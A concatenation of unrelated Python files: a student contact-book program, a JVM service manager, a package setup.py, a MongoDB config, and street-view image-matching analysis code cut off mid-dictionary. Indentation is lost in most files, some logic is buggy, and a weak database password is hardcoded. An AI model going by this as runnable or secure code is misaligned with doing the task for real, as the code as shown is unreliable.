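# ----------------------------------------------------------------------
# A minimal sketch (assumes a full SUAVE installation; a real mission would
# also attach analyses and append this segment to a mission profile):
if __name__ == '__main__':
    segment = Constant_CAS_Constant_Rate()
    segment.altitude_end = 11. * Units.km
    segment.climb_rate = 2.5 * Units.m / Units.s
    segment.calibrated_air_speed = 120. * Units.m / Units.s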
|
# -*- coding: utf-8 -*-
#NAME: Nivan José dos Santos Junior
#RA:
#COURSE: Software Engineering
#SEMESTER: 2nd
import time
import re
class Agenda(object):
    #__init__ IS THE "ENTRY POINT" OF A CLASS, WHERE THE VARIABLES WITH CLASS-WIDE SCOPE ARE DEFINED.
def __init__(self):
self.lista = []
self.ID = 0
self.contato = {}
self.inicio()
    #STRUCTURE OF THE DATA-ENTRY PROMPT
@property
def DADOS_INPUT(self):
print("*" * 30)
self.nome = str(raw_input("Digite o nome: ")).lower()
if len(self.lista) > 0:
for self.contato in self.lista:
while True:
if self.contato["nome"] == self.nome:
print("Esse nome já existe!")
self.nome = str(raw_input("Digite o nome: ")).lower()
else:
break
else:
pass
self.contato = {
"ID": self.ID + 1,
"nome": self.nome,
"email": str(raw_input("Digite o email:")).lower(),
"telefone": str(raw_input("Digite o telefone: ")).lower(),
"instagram": str(raw_input("Digite o instagram: ")).lower(),
"facebook": str(raw_input("Digite o Facebook: ")).lower()
}
return self
def MODIFICA_INPUT(self, nome):
for self.contato in self.lista:
print("=" * 30)
print("-" * 30)
while True:
if nome == self.contato["nome"]:
self.contato["nome"] = str(raw_input("Digite o novo nome: ")).lower()
self.contato["email"] = str(raw_input("Digite o novo email:")).lower()
self.contato["telefone"] = str(raw_input("Digite o novo telefone: ")).lower()
self.contato["instagram"] = str(raw_input("Digite o novo instagram: ")).lower()
self.contato["facebook"] = str(raw_input("Digite o novo Facebook: ")).lower()
self.ESTRUTURA_OUTPUT()
print("Modificado!")
break
else:
print("Não existe esse contato.")
break
    #STRUCTURE OF WHAT WILL BE DISPLAYED.
def ESTRUTURA_OUTPUT(self):
print("=" * 30)
print("ID: {}".format(self.contato["ID"]))
print("-" * 30)
print("\tNome: {}".format(self.contato["nome"]))
print("\tEmail: {}".format(self.contato["email"]))
print("\tTelefone: {}".format(self.contato["telefone"]))
print("\tInstagram: {}".format(self.contato["instagram"]))
print("\tFacebook: {}".format(self.contato["facebook"]))
print("=" * 30)
    #CHECKS WHETHER CERTAIN DATA ALREADY EXISTS.
    #UNDER CONSTRUCTION
def verifica_dado(self, dado):
if len(self.lista) > 0:
for self.contato in self.lista:
if self.contato[dado] == self.nome:
return False
return True
    #APPENDS THE DICTIONARIES TO THE LIST
@property
def manipular_dados(self):
return self.lista.append(self.contato)
    #ALGORITHM TO GENERATE THE FILE NAME
@property
def gerar_nome_arquivo(self):
arquivo = raw_input("Digite o nome do seu arquivo.")
formato = raw_input("Digite o formato. .txt ou .csv?")
out = re.sub(r'[^\w\s+$]', '', arquivo)
out2 = re.sub(r'[^\w\s+$]', '', formato)
self.nome_arquivo = str("{}.{}".format(out, out2))
return self
    #IF THERE IS NO FILE YET, ONE CAN BE CREATED HERE, INCLUDING DECLARING THE FILE NAME
def criar_arquivo(self):
self.gerar_nome_arquivo
print("COMO FICOU O NOME DO ARQUIVO:")
print(self.nome_arquivo)
time.sleep(2)
open(str(self.nome_arquivo), "a")
print("ARQUIVO CRIADO!")
self.start_agenda()
    #READS THE EXTERNAL FILE HERE
def ler_arquivo(self):
arquivo = open("agenda.txt", 'r')
try:
for self.lista in arquivo.readlines():
coluna = self.lista.strip().split(",")
self.contato = {
"ID": coluna[0],
"nome": coluna[1],
"email": coluna[2],
"telefone": coluna[3]
}
arquivo.close()
except:
pass
print(self.lista)
    #LAYS OUT THE LIST THAT WILL BE SHOWN HERE,
    #SO AS NOT TO DISPLAY BARE LISTS AND DICTS.
def mostrar_lista(self):
if len(self.lista) > 0:
for index, self.contato in enumerate(self.lista):
print("\n")
print("=" * 30)
self.ESTRUTURA_OUTPUT()
print("")
time.sleep(0.2)
print("Quantidade de contatos: {}\n".format(len(self.lista)))
else:
print("Não existe nenhum contato cadastrado para listar.\n")
    #SAVES THE CONTACTS TO AN EXTERNAL FILE
def salvar_contatos(self):
arquivo = open("agenda.txt", "w")
for self.contato in self.lista:
arquivo.write("{},{},{},{}\t".format(
self.contato["ID"],
self.contato["nome"],
self.contato["email"],
self.contato["telefone"]))
    #SEARCHES THE LIST BY NAME FOR AN ENTRY, WHICH RETURNS A DICTIONARY
def buscar_contato(self):
if len(self.lista) > 0:
print("-_" * 10 + " Buscar ou Excluir Contato " + "-_" * 10)
nome = str(raw_input("Digite o nome do contato a ser encontrado: \n")).lower()
for self.contato in self.lista:
if self.contato["nome"] == nome:
self.ESTRUTURA_OUTPUT()
option = str(raw_input("Você deseja modificar? S ou N")).upper()
if option == "S":
self.MODIFICA_INPUT(nome)
else:
pass
else:
pass
#print("Não existe esse contato.")
else:
print("Não há registros. Ainda.")
time.sleep(1)
self.start_agenda()
return self
    #ONE OF THE PATHS OF metodo_excluir
def excluir_dados(self):
option = str(raw_input("Você tem certeza? S ou N")).upper()
if option == "S":
if len(self.lista) > 0:
print("EXCLUIR TODOS OS DADOS!")
del self.lista
self.lista = []
self.contato = {}
time.sleep(1)
self.start_agenda()
else:
print("Não tem nada para excluir.")
print("Adicione algo.")
option2 = str(raw_input("Deseja criar os primeiros contatos da sua agenda? S ou N")).upper()
if option2 == "S":
print("=" * 60)
self.criar_contato()
elif option == "N":
print("Ufa. Achei que tu tava ficando doido.")
self.start_agenda()
else:
print("COLOQUE DIREITO OS DADOS!")
    #ONE OF THE PATHS OF metodo_excluir
def excluir_dado(self):
print("EXCLUIR UM DADO!")
print("DISPONIVEIS PARA EXCLUSÃO: {} CONTATOS.".format(self.ID))
while True:
if self.ID > 0:
print("*" * 30 + " Excluir um Contato " + "*" * 30)
while True:
for self.contato in self.lista:
nome = str(raw_input("Digite o nome do contato a ser encontrado: ")).lower()
if self.contato["nome"] == nome:
i = self.contato["ID"] - 1
print(self.ID)
self.ESTRUTURA_OUTPUT()
option = str(raw_input("Você tem certeza que deseja excluir?")).upper()
if option == "S":
while True:
try:
lista = len(self.lista) - 1
del self.lista[i]
if len(self.lista) <= 1:
print("Um foi excluido. {} contato disponivel.".format(lista))
break
else:
print("Um foi excluido. {} contatos disponiveis.".format(lista))
break
except IndexError:
print("Não existe mais contatos.")
break
self.start_agenda()
else:
break
else:
print("Esse nome não existe na Agenda.")
option2 = str(raw_input("Deseja tentar de novo? S ou N")).upper()
if option2 == 'N':
break
self.start_agenda()
else:
break
else:
print("Não há registros. Ainda.")
time.sleep(1)
break
self.start_agenda()
self.start_agenda()
    #DELETE METHOD THAT OFFERS 2 PATHS: DELETE ONE CONTACT OR DELETE ALL.
def metodo_excluir(self):
print("*" * 30 + " Excluir " + "*" * 30)
print("#" * 60)
print("DISPONIVEIS PARA EXCLUSÃO: {} CONTATOS.".format(self.ID))
print('1 - Excluir um contato')
print('2 - Excluir todos')
print('Qualquer numero - Retornar menu')
option = int(raw_input('Escolha: '))
if option == 1:
self.excluir_dado()
elif option == 2:
self.excluir_dados()
else:
print("Retornando ao menu.")
self.start_agenda()
    #CONTACT-CREATION ROUTINE.
    #STRUCTURE THAT CONNECTS TO SEVERAL METHODS AND DATA RETURNS
def criar_contato(self):
print("-_" * 10 + " Criar Contato " + "-_" * 10)
while True:
while True:
try:
option2 = int(raw_input("Gostaria de adicionar quantos?"))
break
except ValueError:
print("Válido somente numeros!")
while option2 >= 1:
self.DADOS_INPUT
option2 = option2 - 1
self.ID = self.ID + 1
self.manipular_dados
self.salvar_contatos()
self.mostrar_lista()
option = str(raw_input("Gostaria de adicionar mais? S ou N"))
if option == 'N':
break
print("Para ver menu novamente, APERTE 6!")
self.start_agenda()
else:
print("OK!")
    #STATIC MENU
@staticmethod
def menu():
print("=" * 30)
print("=" * 30)
print('''
1 - Criar Contato
2 - Excluir Contato
3 - Listar Contatos
4 - Buscar Contato e/ou modifica-lo
5 - Sair
6 - [BÔNUS] Criar Arquivo
''')
print("=" * 30)
    #THE USER-ROUTING FUNCTION, ONE OF THE MAIN METHODS OF THE CLASS,
    #WHERE THE MAIN INTEGRATION OF THE ROUTINES HAPPENS.
def start_agenda(self):
print("*" * 30 + " COMEÇO DA AGENDA. SEJA BEM VINDO! " + "*" * 30)
print("*" * 95)
while True:
self.menu()
            while True:
                try:
                    option = int(raw_input("O que você gostaria de fazer? \n"))
                    break
                except ValueError:
                    print("\nAceito apenas números!\n")
if option == 1:
self.criar_contato()
elif option == 2:
self.metodo_excluir()
elif option == 3:
self.mostrar_lista()
time.sleep(3)
elif option == 4:
self.buscar_contato()
elif option == 5:
self.fim()
break
elif option == 6:
self.criar_arquivo()
else:
print("Dado incorreto!")
print("Digite o 6 para ver o menu novamente.")
    #INITIAL PRESENTATION OF THE ADDRESS BOOK.
@staticmethod
def apresentacao():
print("apresentacao!")
print("#" * 30)
print("SEJA BEM VINDO À AGENDA!")
print("#" * 30)
time.sleep(1)
i = 14
i2 = 30
while i >= 0:
print("#" * i2)
i2 = i2 - 2
time.sleep(0.1)
i = i - 1
    #FAREWELL/EXIT
@staticmethod
def fim():
print("Espero que a agenda tenha sido útil.")
print("Até a próxima.")
    #NIVS'S CREDITS
@staticmethod
def creditos():
print("iniciou!")
time.sleep(1)
print("Feito por Nivs.")
time.sleep(1)
print("Não passei a semana toda estudando orientação em objetos em Python pra você me plagiar de graça.")
time.sleep(1)
print("Sai daqui.")
time.sleep(4)
    #FIRST ENTRY LAYER:
    #ORGANIZES CREDITS, THE INITIAL PRESENTATION, AND THE START OF THE ALGORITHM
def inicio(self):
#self.creditos()
#self.apresentacao()
self.start_agenda()
agenda = Agenda()
|
#!/usr/bin/env python
import json
import time
import re
from abc import abstractmethod
import requests
from servicemanager.smprocess import SmProcess, kill_pid
from servicemanager.service.smservice import (
SmService,
SmMicroServiceStarter,
SmServiceStatus,
)
from servicemanager.smrepo import clone_repo_if_requred
class SmJvmServiceStarter(SmMicroServiceStarter):
test_id_param = "service.manager.testId"
def __init__(
self,
context,
service_name,
expected_service_type,
run_from,
port,
classifier,
service_mapping_ports,
version,
proxy,
append_args,
):
SmMicroServiceStarter.__init__(
self,
context,
service_name,
expected_service_type,
run_from,
port,
classifier,
service_mapping_ports,
version,
proxy,
append_args,
)
def start(self, appendArgs=None):
if self.run_from == "SOURCE":
if not clone_repo_if_requred(self):
# TODO - should this just return None? or throw an exception? Should clone_repo_if_required throw an exception?
return None
return self.start_from_sources()
else:
return self.start_from_binary()
def process_arguments(self):
run_from = self.run_from
if self.run_from == "RELEASE":
run_from = (self.version or "UNKNOWN") + "-" + run_from
jvm_args = ["-Dservice.manager.serviceName=%s" % self.service_name]
jvm_args += ["-Dservice.manager.runFrom=%s" % run_from]
if self.context.is_test:
jvm_args += ["-Dservice.manager.testId=%s" % self.context.test_id]
jvm_args += ["-Dservice.manager.startTime=%s" % time.time()]
return jvm_args
@abstractmethod
def start_from_sources(self):
pass
@abstractmethod
def start_from_binary(self):
pass
class SmJvmService(SmService):
def __init__(self, context, service_name, expected_service_type):
SmService.__init__(self, context, service_name, expected_service_type)
self.pattern = "service.manager.serviceName=%s$" % self.service_name
self.default_port = self.required_data("defaultPort")
self.healthcheck = self.required_data("healthcheck")
@abstractmethod
def post_stop(self):
pass
@abstractmethod
def get_port_argument(self):
pass
@abstractmethod
def get_running_healthcheck_port(self, process):
pass
@abstractmethod
def get_details_url(self):
pass
def get_pattern(self):
return self.pattern
def status(self, all_processes=None):
processes = SmProcess.processes_matching(self.pattern, all_processes)
def _status_for_process(process):
port = process.extract_integer_argument("-D%s=(\d*)" % self.get_port_argument(), self.default_port)
test_id = process.extract_argument("-Dservice.manager.testId=([^ ]+)", "")
run_from = process.extract_argument("-Dservice.manager.runFrom=([^ ]+)", "")
features = process.extract_arguments("-Dfeature.([^ =]+)=true", "")
healthcheck = (
SmServiceStatus.HEALTHCHECK_PASS if self.run_healthcheck(process) else SmServiceStatus.HEALTHCHECK_BOOT
)
return SmServiceStatus.for_process(
self.service_name, process, port, test_id, run_from, features, healthcheck,
)
return list(map(_status_for_process, processes))
def request_running_service_details_on_default_port(self):
url = self.get_details_url().replace("${port}", str(self.default_port))
try:
response = requests.get(url)
return json.loads(response.text)
except requests.RequestException:
return None
def is_started_on_default_port(self):
processes = SmProcess.processes_matching(self.pattern)
default_port_argument = "-D%s=%d" % (self.get_port_argument, self.default_port)
for process in processes:
if process.has_argument(default_port_argument):
return True
return False
def get_default_healthcheck_port(self):
return self.default_port
def stop(self, wait=False):
for process in SmProcess.processes_matching(self.pattern):
kill_pid(self.context, process.ppid, wait=wait)
kill_pid(self.context, process.pid, wait=wait)
self.context.log(
"name: %s\tppid: %s\tpid: %s\tuptime: %s"
% (self.service_name, process.ppid, process.pid, process.uptime),
True,
)
self.post_stop()
def run_healthcheck(self, process):
port = self.get_running_healthcheck_port(process)
if not port:
port = self.get_default_healthcheck_port()
healthcheck_url = self.service_data["healthcheck"]["url"].replace("${port}", str(port))
healthcheck_response_regex = self.service_data["healthcheck"]["response"] or ""
try:
ping_response = requests.get(healthcheck_url)
response_text = ping_response.text
return re.search(healthcheck_response_regex, response_text) and ping_response.status_code == 200
except requests.RequestException:
return False
|
from distutils.core import setup
setup(
name = 'guts',
version = '0.2',
description = 'Lightweight declarative YAML and XML data binding for Python.',
package_dir = { '': 'src' },
py_modules = ['guts', 'guts_array'],
scripts = [ 'scripts/xmlschema-to-guts' ],
author = 'Sebastian Heimann',
author_email = 'sebastian.heimann@gfz-potsdam.de',
url = 'https://github.com/emolch/guts/',
keywords = [ 'data-binding', 'xml', 'yaml' ],
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
|
import pymongo
from pymongo import MongoClient
from pymongo.errors import ConnectionFailure
import urllib.parse
from dotenv import load_dotenv
import os
load_dotenv(".env")
class Config():
def __init__(self):
self.cluster = pymongo.MongoClient(os.getenv("MONGO_URI"))
        try:
            print("connecting to mongo")
            # force a real round trip so ConnectionFailure can actually be raised
            self.cluster.admin.command("ping")
        except ConnectionFailure:
            print("Server not available")
        else:
            print("connected to mongo")
self.database = self.cluster["Twitter"]
def create_author_thread_db(self, author, threads):
collection = self.cluster["threads"][author]
collection.drop()
collection.insert_many(threads)
def create_author_data_db(self, author, data):
collection = self.cluster["authors"]["info"]
        collection.insert_one(data)
def insert_threads(self, author, data):
collection = self.cluster["Twitter"]["threads"]
ids = [doc["_id"] for doc in data]
collection.delete_many({"_id": {"$in": ids}})
collection.insert_many(data)
def delete_threads(self, author):
collection = self.cluster["Twitter"]["threads"]
collection.delete_many({"author": author})
# return deleted_count.deleted_count
def list_authors(self):
collection = self.cluster["Twitter"]["threads"]
distinct = collection.distinct("author")
return distinct
def create_index(self):
collection = self.cluster["Twitter"]["threads"]
collection.drop_indexes()
collection.create_index([("keywords", "text"),
("thread_texts", "text")],
name="thread_text_index")
# for d in collection.find({"$text": {"$search": "people"}}).limit(1):
# print(d)
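# Usage sketch (assumes a reachable cluster and a valid MONGO_URI in .env):
# rebuild the text index, then list the distinct thread authors.
if __name__ == "__main__":
    config = Config()
    config.create_index()
    print(config.list_authors())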
|
# -*- coding: utf-8 -*-
"""
Created on Wed May 5 18:27:47 2021
@author: richie bao -Spatial structure index value distribution of urban streetscape
"""
import pickle
from database import postSQL2gpd,gpd2postSQL
from segs_object_analysis import seg_equirectangular_idxs
import glob,os
import numpy as np
import pandas as pd
from pathlib import Path
xian_epsg=32649 #Xi'an WGS84 / UTM zone 49N
wgs84_epsg=4326
class dynamicStreetView_visualPerception:
    '''
    class - Uses the Star detector to extract image keypoints and SIFT to compute descriptors, then analyzes feature change from the matches (change in visual perception), i.e. dynamic street-view visual perception
    Paras:
        imgs_fp - list of image file paths
        knnMatch_ratio - ratio-test threshold for matching, default 0.75
    '''
def __init__(self,imgs_fp,knnMatch_ratio=0.75):
self.knnMatch_ratio=knnMatch_ratio
self.imgs_fp=imgs_fp
def kp_descriptor(self,img_fp):
import cv2 as cv
        '''
        function - Extract keypoints and compute SIFT descriptors
        '''
img=cv.imread(img_fp)
star_detector=cv.xfeatures2d.StarDetector_create()
        key_points=star_detector.detect(img) # run the Star feature detector and return the detected keypoints
        img_gray=cv.cvtColor(img,cv.COLOR_BGR2GRAY) # convert the image to grayscale
        kp,des=cv.xfeatures2d.SIFT_create().compute(img_gray, key_points) # compute SIFT descriptors at the detected keypoints
return kp,des
def feature_matching(self,des_1,des_2,kp_1=None,kp_2=None):
import cv2 as cv
        '''
        function - Match descriptors between two images
        '''
bf=cv.BFMatcher()
matches=bf.knnMatch(des_1,des_2,k=2)
'''
        From the matches one can recover the positional indices of the (train, query) keypoints, the index of the train image, and the distance between descriptors:
DMatch.distance - Distance between descriptors. The lower, the better it is.
DMatch.trainIdx - Index of the descriptor in train descriptors
DMatch.queryIdx - Index of the descriptor in query descriptors
DMatch.imgIdx - Index of the train image.
'''
'''
if kp_1 !=None and kp_2 != None:
kp1_list=[kp_1[mat[0].queryIdx].pt for mat in matches]
kp2_list=[kp_2[mat[0].trainIdx].pt for mat in matches]
des_distance=[(mat[0].distance,mat[1].distance) for mat in matches]
print(des_distance[:5])
'''
good=[]
for m,n in matches:
if m.distance < self.knnMatch_ratio*n.distance:
good.append(m)
#good_num=len(good)
return good #,good_num
def sequence_statistics(self):
from tqdm import tqdm
        '''
        function - Sequence matching: match the image at each position against all subsequent positions
        '''
des_list=[]
print("计算关键点和描述子...")
for f in tqdm(self.imgs_fp):
_,des=self.kp_descriptor(f)
des_list.append(des)
matches_sequence={}
print("计算序列图像匹配数...")
for i in tqdm(range(len(des_list)-1)):
matches_temp=[]
for j_des in des_list[i:]:
matches_temp.append(self.feature_matching(des_list[i],j_des))
matches_sequence[i]=matches_temp
matches_num={k:[len(v) for v in val] for k,val in matches_sequence.items()}
return matches_num
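# Usage sketch (assumes opencv-contrib-python with the non-free xfeatures2d
# module and a folder of sequential street-view frames; the path below is
# illustrative):
if __name__=="__main__":
    imgs_fp=sorted(glob.glob('./data/streetview/*.jpg'))
    dsv=dynamicStreetView_visualPerception(imgs_fp)
    matches_num=dsv.sequence_statistics()
    print({k:v[:5] for k,v in matches_num.items()})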
class movingAverage_inflection:
import pandas as pd
    '''
    class - Smooths a curve (data) and finds the points where the curve's slope turns horizontal or vertical
    Paras:
        series - data as a pandas Series
        window - sliding-window size; the larger the value, the stronger the smoothing
        plot_intervals - whether to plot confidence intervals, default False
        scale - deviation scale, default 1.96
        plot_anomalies - whether to plot anomalies, default False
        figsize - figure size, default (15,5)
        threshold - inflection threshold, default 0
    '''
def __init__(self,series, window, plot_intervals=False, scale=1.96, plot_anomalies=False,figsize=(15,5),threshold=0):
self.series=series
self.window=window
self.plot_intervals=plot_intervals
self.scale=scale
self.plot_anomalies=plot_anomalies
self.figsize=figsize
self.threshold=threshold
self.rolling_mean=self.movingAverage()
def masks(self,vec):
        '''
        function - find where the curve's slope changes horizontally or vertically; see https://stackoverflow.com/questions/47342447/find-locations-on-a-curve-where-the-slope-changes
        '''
d=np.diff(vec)
dd=np.diff(d)
# Mask of locations where graph goes to vertical or horizontal, depending on vec
to_mask=((d[:-1] != self.threshold) & (d[:-1] == -dd-self.threshold))
# Mask of locations where graph comes from vertical or horizontal, depending on vec
from_mask=((d[1:] != self.threshold) & (d[1:] == dd-self.threshold))
return to_mask, from_mask
def apply_mask(self,mask, x, y):
return x[1:-1][mask], y[1:-1][mask]
def knee_elbow(self):
        '''
        function - return the start and end positions of the inflection (knee/elbow) points
        '''
x_r=np.array(self.rolling_mean.index)
y_r=np.array(self.rolling_mean)
to_vert_mask, from_vert_mask=self.masks(x_r)
to_horiz_mask, from_horiz_mask=self.masks(y_r)
to_vert_t, to_vert_v=self.apply_mask(to_vert_mask, x_r, y_r)
from_vert_t, from_vert_v=self.apply_mask(from_vert_mask, x_r, y_r)
to_horiz_t, to_horiz_v=self.apply_mask(to_horiz_mask, x_r, y_r)
from_horiz_t, from_horiz_v=self.apply_mask(from_horiz_mask, x_r, y_r)
return x_r,y_r,to_vert_t, to_vert_v,from_vert_t, from_vert_v,to_horiz_t, to_horiz_v,from_horiz_t, from_horiz_v
def movingAverage(self):
rolling_mean=self.series.rolling(window=self.window).mean()
return rolling_mean
def plot_movingAverage(self,inflection=False):
import numpy as np
        from sklearn.metrics import mean_absolute_error
import matplotlib.pyplot as plt
"""
function - 打印移动平衡/滑动窗口,及拐点
"""
plt.figure(figsize=self.figsize)
plt.title("Moving average\n window size = {}".format(self.window))
plt.plot(self.rolling_mean, "g", label="Rolling mean trend")
        # Plot confidence intervals for smoothed values
if self.plot_intervals:
mae=mean_absolute_error(self.series[self.window:], self.rolling_mean[self.window:])
deviation=np.std(self.series[self.window:] - self.rolling_mean[self.window:])
lower_bond=self.rolling_mean - (mae + self.scale * deviation)
upper_bond=self.rolling_mean + (mae + self.scale * deviation)
plt.plot(upper_bond, "r--", label="Upper Bond / Lower Bond")
plt.plot(lower_bond, "r--")
            # Having the intervals, find abnormal values
if self.plot_anomalies:
anomalies=pd.DataFrame(index=self.series.index, columns=self.series.to_frame().columns)
anomalies[self.series<lower_bond]=self.series[self.series<lower_bond].to_frame()
anomalies[self.series>upper_bond]=self.series[self.series>upper_bond].to_frame()
plt.plot(anomalies, "ro", markersize=10)
if inflection:
x_r,y_r,to_vert_t, to_vert_v,from_vert_t, from_vert_v,to_horiz_t, to_horiz_v,from_horiz_t, from_horiz_v=self.knee_elbow()
plt.plot(x_r, y_r, 'b-')
plt.plot(to_vert_t, to_vert_v, 'r^', label='Plot goes vertical')
plt.plot(from_vert_t, from_vert_v, 'kv', label='Plot stops being vertical')
plt.plot(to_horiz_t, to_horiz_v, 'r>', label='Plot goes horizontal')
plt.plot(from_horiz_t, from_horiz_v, 'k<', label='Plot stops being horizontal')
plt.plot(self.series[self.window:], label="Actual values")
plt.legend(loc="upper right")
plt.grid(True)
plt.xticks(rotation='vertical')
plt.show()
def vanishing_position_length(matches_num,coordi_df,epsg,**kwargs):
from shapely.geometry import Point, LineString, shape
import geopandas as gpd
import pyproj
    '''
    function - compute the distance at which matched feature points become nearly unrelated, i.e., the distance at which visual perception of a given position fades as it recedes
    Paras:
        matches_num - keypoint match counts computed by the dynamicStreetView_visualPerception class
        coordi_df - DataFrame containing longitude and latitude, with columns: lon, lat
        **kwargs - configuration parameters as in the movingAverage_inflection class
    '''
MAI_paras={'window':15,'plot_intervals':True,'scale':1.96, 'plot_anomalies':True,'figsize':(15*2,5*2),'threshold':0}
MAI_paras.update(kwargs)
#print( MAI_paras)
vanishing_position={}
for idx in range(len(matches_num)):
x=np.array(range(idx,idx+len(matches_num[idx])))
y=np.array(matches_num[idx])
y_=pd.Series(y,index=x)
MAI=movingAverage_inflection(y_, window=MAI_paras['window'],plot_intervals=MAI_paras['plot_intervals'],scale=MAI_paras['scale'], plot_anomalies=MAI_paras['plot_anomalies'],figsize=MAI_paras['figsize'],threshold=MAI_paras['threshold'])
_,_,_,_,from_vert_t, _,_, _,from_horiz_t,_=MAI.knee_elbow()
        if from_horiz_t.size > 0: # at least one "stops being horizontal" point was found
vanishing_position[idx]=(idx,from_horiz_t[0])
else:
vanishing_position[idx]=(idx,idx)
vanishing_position_df=pd.DataFrame.from_dict(vanishing_position,orient='index',columns=['start_idx','end_idx'])
vanishing_position_df['geometry']=vanishing_position_df.apply(lambda idx:LineString(coordi_df[idx.start_idx:idx.end_idx]['geometry'].tolist()), axis=1)
    crs_4326="EPSG:4326"
    vanishing_position_gdf=gpd.GeoDataFrame(vanishing_position_df,geometry='geometry',crs=crs_4326)
crs_=pyproj.CRS(epsg)
vanishing_position_gdf_reproj=vanishing_position_gdf.to_crs(crs_)
vanishing_position_gdf_reproj['length']=vanishing_position_gdf_reproj.geometry.length
return vanishing_position_gdf_reproj
def movingAverage(series,window):
rolling_mean=series.rolling(window=window).mean()
return rolling_mean
def tourLine_segs_vanishing_position_length(tourLine_segment,img_fp_list_sorted,coordi_df,xian_epsg):
from tqdm import tqdm
vanishing_dict={}
for k,v in tqdm(tourLine_segment.items()):
img_fp_seg_list=img_fp_list_sorted[v[0]:v[1]]
dsv_vp=dynamicStreetView_visualPerception(img_fp_seg_list) #[:200]
matches_num=dsv_vp.sequence_statistics()
coordi_seg_df=coordi_df[v[0]:v[1]]
vanishing_gpd=vanishing_position_length(matches_num,coordi_seg_df,epsg="EPSG:{}".format(xian_epsg),threshold=0)
vanishing_dict[k]=vanishing_gpd
with open('./processed data/tourLine_vanishing.pkl','wb') as f:
pickle.dump(vanishing_dict,f)
return vanishing_dict
def segs_vanishing_statistics(vanishing_dict):
segs_Vanishing_stat={}
for k,vanishing_gpd in vanishing_dict.items():
vanishing_length_desc=vanishing_gpd.length.describe()
vanishing_fre=vanishing_gpd.length.value_counts(bins=5)
segs_Vanishing_stat[k]={'vanishing_length_desc':vanishing_length_desc,'vanishing_fre':vanishing_fre}
return segs_Vanishing_stat
def vanishing_segment_mark(vanishing_length,length_moving_reverse,tourLine_segment,segment_name):
import matplotlib.pyplot as plt
import matplotlib
font = {
# 'family' : 'normal',
# 'weight' : 'bold',
'size' : 28}
matplotlib.rc('font', **font)
fig, ax=plt.subplots(figsize=(30,10))
ax.plot(vanishing_length,label='vanishing distance_north')
length_moving_reverse_list=length_moving_reverse.to_list()
length_moving_reverse_list.reverse()
ax.plot(length_moving_reverse_list,'--',label='vanishing distance_south')
v_length=[]
for k,v in tourLine_segment.items():
# print(k,v)
# v_length_seg=vanishing_length.iloc[v[0]:v[1]].to_list()
# print(length_seg)
# print(segment_name[k])
ax.vlines(v[1],0,800,colors='r',linestyle='--',) #label=segment_name[k]
ax.text(v[1],920, segment_name[k], fontsize=22,rotation=-90, rotation_mode='anchor',va='top')
plt.legend(loc=3)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
# plt.show()
plt.savefig('./graph/vanishing_segment_mark.png',dpi=300)
if __name__=="__main__":
# 01
# tourLine_seg_path='./processed data/tour line seg'
# tourline_label_seg_path='./processed data/tourline_label_seg'
# tourLine_img_path='./data/panoramic imgs_tour line valid'
# with open('./processed data/coords_tourLine.pkl','rb') as f:
# coords_tourLine=pickle.load(f)
# tourLine_panorama_object_percent_gdf=seg_equirectangular_idxs(tourline_label_seg_path,tourLine_seg_path,tourLine_img_path,coords_tourLine,)
# gpd2postSQL(tourLine_panorama_object_percent_gdf,table_name='tourLine_panorama_object_percent',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
#02
#sift and match
# img_fp_list=glob.glob(os.path.join(tourLine_img_path,'*.jpg'))
# img_fp_dict={int(Path(p).stem.split('_')[-1]):p for p in img_fp_list}
# img_fp_key=list(img_fp_dict.keys())
# img_fp_key.sort()
# img_fp_list_sorted=[img_fp_dict[k] for k in img_fp_key]
# img_fp_list_sorted.reverse()
# dsv_vp=dynamicStreetView_visualPerception(img_fp_list_sorted) #[:200]
# matches_num=dsv_vp.sequence_statistics()
#03
# idx=508
# x=np.array(range(idx,idx+len(matches_num[idx])))
# y=np.array(matches_num[idx])
# y_=pd.Series(y,index=x)
# MAI=movingAverage_inflection(y_, window=15,plot_intervals=True,scale=1.96, plot_anomalies=True,figsize=(15*2,5*2),threshold=0)
# MAI.plot_movingAverage(inflection=True)
#04
# tourLine_panorama_object_percent_gdf=postSQL2gpd(table_name='tourLine_panorama_object_percent',geom_col='geometry',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
# coordi_df=tourLine_panorama_object_percent_gdf.sort_values(by='fn_idx')
# vanishing_gpd=vanishing_position_length(matches_num,coordi_df,epsg="EPSG:{}".format(xian_epsg),threshold=0)
# print("感知消失距离统计:","_"*50,"\n")
# print(vanishing_gpd[vanishing_gpd["length"] >1].length.describe())
# print("频数统计:","_"*50,"\n")
# print(vanishing_gpd[vanishing_gpd["length"] >1]["length"].value_counts(bins=5))
#'tourLine_vanishing'
# gpd2postSQL(vanishing_gpd,table_name='tourLine_vanishing_reverse',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
#05
tourLine_vanishing_gdf=postSQL2gpd(table_name='tourLine_vanishing',geom_col='geometry',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
length_moving=movingAverage(tourLine_vanishing_gdf.length,window=15)
length_moving.plot(figsize=(20,10))
tourLine_vanishing_reverse_gdf=postSQL2gpd(table_name='tourLine_vanishing_reverse',geom_col='geometry',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
length_moving_reverse=movingAverage(tourLine_vanishing_reverse_gdf.length,window=15)
length_moving_reverse.plot(figsize=(20,10))
#06
tourLine_segment={
0:(0,39),
1:(39,101),
2:(101,191),
3:(191,290),
4:(290,367),
5:(367,437),
6:(437,462),
7:(462,488),
8:(488,565),
9:(565,603)
}
# vanishing_dict=tourLine_segs_vanishing_position_length(tourLine_segment,img_fp_list_sorted,coordi_df,xian_epsg)
# with open('./processed data/tourLine_vanishing.pkl','rb') as f:
# vanishing_dict=pickle.load(f)
# segs_Vanishing_stat=segs_vanishing_statistics(vanishing_dict)
# segs_vanishing_desc={k:segs_Vanishing_stat[k]['vanishing_length_desc'] for k in segs_Vanishing_stat.keys()}
# # pd.set_option('display.max_columns', None)
# segs_vanishing_desc_df=pd.DataFrame.from_dict(segs_vanishing_desc)
# tour_line_seg_gdf=postSQL2gpd(table_name='tour_line_seg',geom_col='geometry',myusername='postgres',mypassword='123456',mydatabase='streetscape_GSV')
tourLine_segment_name={
